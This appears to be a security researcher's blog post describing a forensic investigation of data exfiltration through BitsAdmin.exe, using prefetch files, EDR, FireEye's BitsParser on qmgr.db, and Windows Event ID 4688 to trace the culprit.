Hi everyone, today I want to discuss a data exfiltration scenario I recently encountered during an investigation. As a security researcher, it’s crucial to identify and understand how attackers are stealing data.
Unusual Network Traffic
The initial red flag was unusual network traffic patterns, which often indicate potential data exfiltration. This triggered our incident response team to investigate further.
Prefetch Files and EDR
Our investigation began with analyzing prefetch files. These files contain information about recently executed programs. We noticed entries for BitsAdmin.exe, a legitimate tool sometimes misused for data exfiltration. Our EDR (Endpoint Detection and Response) solution confirmed this activity.
Identifying Source, Destination, and Commands
To understand the scope of the exfiltration, we needed to determine the source and destination of the stolen data, as well as the specific commands used. While searching for a way to analyze the relevant .db file (qmgr.db located at C:\ProgramData\Microsoft\Network\Downloader), I discovered a helpful GitHub repository: https://github.com/fireeye/BitsParser/blob/master/advapi32.py.
BitsParser to the Rescue
This repository, BitsParser by FireEye, provided a way to parse the qmgr.db file. Using BitsParser, we were able to extract valuable information, including:
- Job ID
- Job name
- Command used
- Creation and modification times
- Source and destination URLs
- User accounts initiating the jobs
This provided a clear view of the exfiltration activity.
Finding the Culprit
The next challenge was to identify the user account responsible for executing itsAdmin.exe. While EDR can simplify this process, it’s also achievable by examining the Windows Event Log for Event ID 4688, which tracks process creation events.
Next Steps
With the source and culprit identified, the incident response team can take steps to contain the threat, remediate the vulnerability, and prevent future exfiltration attempts.
Stay Vigilant
This scenario highlights the importance of monitoring network traffic, analyzing prefetch files, and leveraging EDR solutions. By combining these techniques with tools like BitsParser, security researchers can effectively investigate and respond to data exfiltration attempts.
Note: I replaced the sensitive screenshots with descriptions to avoid including potentially revealing information.